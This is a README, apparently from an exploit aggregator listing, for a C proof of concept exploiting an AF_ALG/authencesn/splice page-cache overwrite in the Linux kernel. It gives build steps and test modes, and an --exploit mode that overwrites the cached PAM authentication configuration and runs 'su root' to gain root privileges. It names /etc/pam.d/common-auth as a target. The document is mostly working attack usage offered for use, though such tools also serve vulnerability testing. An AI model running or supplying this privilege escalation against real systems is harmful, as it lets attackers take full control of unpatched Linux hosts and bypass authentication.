Share
## https://sploitus.com/exploit?id=7BF63EF6-1CE5-5D7C-8E5E-AEEEC6358898
# authencesn-poc (Mrowl)
made by c0redev (https://unitdev.run)
C PoC for `AF_ALG` + `authencesn` + `splice` page-cache overwrite.
Build:
```bash
make
make static
```
Run test:
```bash
./authencesn-poc --safe
```
Run algorithm matrix:
```bash
./authencesn-poc --matrix
```
Show PAM exploit offsets without triggering:
```bash
./authencesn-poc --exploit --dry-run
```
Trigger PAM page-cache overwrite and run `su root`:
```bash
./authencesn-poc --exploit
```
Scan duplicate 4-byte sequences in a target file:
```bash
./authencesn-poc --check /etc/pam.d/common-auth
```
Expected vulnerable safe output:
```text
[+] VULNERABLE: page-cache overwrite confirmed
```